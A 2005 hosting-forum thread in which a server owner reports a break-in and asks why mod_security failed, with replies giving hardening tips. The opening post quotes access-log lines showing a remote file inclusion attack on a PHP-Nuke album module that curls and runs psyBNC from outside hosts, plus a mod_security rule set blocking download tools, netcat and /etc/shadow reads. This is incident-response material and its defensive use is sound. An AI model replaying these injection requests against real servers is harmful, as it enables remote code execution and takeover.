#1 (permalink)  
Old 10-12-2005, 11:56 AM
Registered User
 
Join Date: Aug 2003
Location: Israel
Posts: 19
parser
server hacked

Hello,

today my server hacked,
201.5.212.224 - - [11/Oct/2005:00:48:58 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;curl%20-o%20psybnc.tar.gz%20lgbos.100free.com/psybnc.tar.gz;tar%20-zxvf%20psybnc.tar.gz HTTP/1.1" 200 14964 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:49:52 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;rm%20-rf%20psybnc.tar.gz HTTP/1.1" 200 5997 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:50:54 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;curl%20-o%20psybnc.tar.gz%20http://www.psychoid.lam3rz.de/psyBNC2.3.2-4.tar.gz HTTP/1.1" 200 6472 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:51:27 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;tar%20-xvzf%20psybnc.tar.gz HTTP/1.1" 200 15481 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:51:42 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;cd%20psybnc;make;pico%20psybnc.conf;./psybnc HTTP/1.1" 200 6129 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:52:50 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;rm%20-rf%20psybnc HTTP/1.1" 200 5997 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:53:40 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;curl%20-o%20psybnc.tar.gz%20http://www.geocities.com/sorin_smen/psybnc.tgz HTTP/1.1" 200 6867 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:53:47 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp;tar%20-zxvf%20psybnc.tgz;cd%20psybnc;./psybnc HTTP/1.1" 200 6045 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:54:02 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp/psybnc;./psybnc HTTP/1.1" 200 6045 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
201.5.212.224 - - [11/Oct/2005:00:54:07 +0200] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.booy.s5.com/newcmd.gif?&cmd=cd%20/var/tmp/psybnc;ls HTTP/1.1" 200 6147 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"


i have modsec.user.conf, but is not help. Why?

# Require HTTP_USER_AGENT and HTTP_HOST in all requests
# SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"

# Require Content-Length to be provided with
# every POST request
SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"

# Don't accept transfer encodings we know we don't handle
# (and you don't need it anyway)
SecFilterSelective HTTP_Transfer-Encoding "!^$"

# Protecting from XSS attacks through the PHP session cookie
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"

SecFilter "viewtopic\.php\?" chain
SecFilter "chr\(([0-9]{1,3})\)" "deny,log"

# Block various methods of downloading files to a server
SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "lynx "
SecFilterSelective THE_REQUEST "scp "
SecFilterSelective THE_REQUEST "ftp "
SecFilterSelective THE_REQUEST "cvs "
SecFilterSelective THE_REQUEST "rcp "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "ssh "
SecFilterSelective THE_REQUEST "echo "
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-charset "
SecFilterSelective THE_REQUEST "links -dump-width "
SecFilterSelective THE_REQUEST "links http:// "
SecFilterSelective THE_REQUEST "links ftp:// "
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "mkdir "
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "


# WEB-ATTACKS ps command attempt
SecFilterSelective THE_REQUEST "/bin/ps"

# WEB-ATTACKS /bin/ps command attempt
SecFilterSelective THE_REQUEST "ps\x20"

# WEB-ATTACKS wget command attempt
SecFilter "wget\x20"

# WEB-ATTACKS uname -a command attempt
SecFilter "uname\x20-a"

# WEB-ATTACKS /usr/bin/id command attempt
SecFilter "/usr/bin/id"

# WEB-ATTACKS id command attempt
SecFilter "\;id"

# WEB-ATTACKS echo command attempt
SecFilter "/bin/echo"

# WEB-ATTACKS kill command attempt
SecFilter "/bin/kill"

# WEB-ATTACKS chmod command attempt
SecFilter "/bin/chmod"

# WEB-ATTACKS chgrp command attempt
SecFilter "/chgrp"

# WEB-ATTACKS chown command attempt
SecFilter "/chown"

# WEB-ATTACKS chsh command attempt
SecFilter "/usr/bin/chsh"

# WEB-ATTACKS tftp command attempt
SecFilter "tftp\x20"

# WEB-ATTACKS /usr/bin/gcc command attempt
SecFilter "/usr/bin/gcc"

# WEB-ATTACKS gcc command attempt
SecFilter "gcc\x20-o"

# WEB-ATTACKS /usr/bin/cc command attempt
SecFilter "/usr/bin/cc"

# WEB-ATTACKS cc command attempt
SecFilter "cc\x20"

# WEB-ATTACKS /usr/bin/cpp command attempt
SecFilter "/usr/bin/cpp"

# WEB-ATTACKS cpp command attempt
SecFilter "cpp\x20"

# WEB-ATTACKS /usr/bin/g++ command attempt
SecFilter "/usr/bin/g\+\+"

# WEB-ATTACKS g++ command attempt
SecFilter "g\+\+\x20"

# WEB-ATTACKS bin/python access attempt
SecFilter "bin/python"

# WEB-ATTACKS python access attempt
SecFilter "python\x20"

# WEB-ATTACKS bin/tclsh execution attempt
SecFilter "bin/tclsh"

# WEB-ATTACKS tclsh execution attempt
SecFilter "tclsh8\x20"

# WEB-ATTACKS bin/nasm command attempt
SecFilter "bin/nasm"

# WEB-ATTACKS nasm command attempt
SecFilter "nasm\x20"

# WEB-ATTACKS /usr/bin/perl execution attempt
SecFilter "/usr/bin/perl"

# WEB-ATTACKS perl execution attempt
SecFilter "perl\x20"

# WEB-ATTACKS nt admin addition attempt
SecFilter "net localgroup administrators /add"

# WEB-ATTACKS traceroute command attempt
SecFilter "traceroute\x20"

# WEB-ATTACKS ping command attempt
SecFilter "/bin/ping"

# WEB-ATTACKS netcat command attempt
SecFilter "nc\x20"

# WEB-ATTACKS nmap command attempt
SecFilter "nmap\x20"

# WEB-ATTACKS xterm command attempt
SecFilter "/usr/X11R6/bin/xterm"

# WEB-ATTACKS X application to remote host attempt
SecFilter "\x20-display\x20"

# WEB-ATTACKS lsof command attempt
SecFilter "lsof\x20"

# WEB-ATTACKS rm command attempt
SecFilter "rm\x20"

# WEB-ATTACKS mail command attempt
SecFilter "/bin/mail"

# WEB-ATTACKS mail command attempt
SecFilter "mail\x20"

# WEB-ATTACKS /bin/ls command attempt
SecFilterSelective THE_REQUEST "/bin/ls"

# WEB-ATTACKS /etc/inetd.conf access
SecFilter "/etc/inetd\.conf" log,pass

# WEB-ATTACKS /etc/motd access
SecFilter "/etc/motd" log,pass

# WEB-ATTACKS /etc/shadow access
SecFilter "/etc/shadow" log,pass

# WEB-ATTACKS conf/httpd.conf attempt
SecFilter "conf/httpd\.conf" log,pass

# WEB-ATTACKS .htgroup access
SecFilterSelective THE_REQUEST "\.htgroup" log,pass

#PHP-NUKE spam filter
SecFilter "name=WebMail"

#PHP-NUKE web attack
SecFilter "cd%20/var/tmp;"

#PHP-NUKE web attack
SecFilter "cd%20/var/tmp"

#PHP-NUKE web attack
SecFilter "cd%20/tmp"

#PHP-NUKE web attack
SecFilter "chmod%204777"

# phpbb2 shell exploit
SecFilter "rush="
SecFilter "highlight=%2527"
SecFilter "highlight=%2725"
SecFilter "highlight=%27"
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #2 (permalink)  
Old 10-12-2005, 03:37 PM
linux-image's Avatar
Registered User
 
Join Date: Jun 2004
Location: India
Posts: 1,175
linux-image is on a distinguished road
check if LoadModule is active at the httpd.conf.
__________________
linux-image
AIM: "tux image"
Msn: "tux_image@hotmail.com"
Yahoo: "masternikx"

http://admin-ahead.com
Open Tickets: https://www.ticketforge.com
FAQ's: http://scriptmantra.info/

Tips: http://tips.admin-ahead.com
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #3 (permalink)  
Old 10-12-2005, 04:03 PM
sh4ka's Avatar
Registered User
 
Join Date: May 2005
Posts: 431
sh4ka is on a distinguished road
You should better check if the Addmodule mod_security is not commented or if it exists at the AddModule section. Also try to activate all process listed on "background process killer" at "System Health" in the left WHM menu.

Is your Mod security installed from the Add on in WHM ??
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #4 (permalink)  
Old 10-12-2005, 05:11 PM
neta5's Avatar
Registered User
 
Join Date: Oct 2005
Posts: 34
neta5 is on a distinguished road
you mean its better that we Turn on these item?
BitchX
bnc
eggdrop
generic-sniffers
guardservices
ircd
psyBNC
ptlink
services
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #5 (permalink)  
Old 10-12-2005, 05:52 PM
Registered User
 
Join Date: Aug 2003
Location: Israel
Posts: 19
parser
Quote:
Originally Posted by linux-image
check if LoadModule is active at the httpd.conf.
Active, it problem with filtring of mod_secure.

In audit_log (Log of mod_secure), all for example "wget" denied with code 406.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #6 (permalink)  
Old 10-12-2005, 05:57 PM
Registered User
 
Join Date: Aug 2003
Location: Israel
Posts: 19
parser
Quote:
Originally Posted by sh4ka
You should better check if the Addmodule mod_security is not commented or if it exists at the AddModule section. Also try to activate all process listed on "background process killer" at "System Health" in the left WHM menu.

Is your Mod security installed from the Add on in WHM ??

Yes, installed from WHM.
I Activated all process listed on "background process killer". Thanks!
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #7 (permalink)  
Old 10-13-2005, 11:16 AM
Registered User
 
Join Date: Aug 2005
Posts: 42
domtaj is on a distinguished road
The file got dropped by way of curl, so better put

SecFilterSelective THE_REQUEST "curl "

into mod_security's conf file

as that will also stop other non detected drops
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On



All times are GMT -5. The time now is 07:51 AM.


Powered by vBulletin® Version 3.8.2
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
© cPanel Inc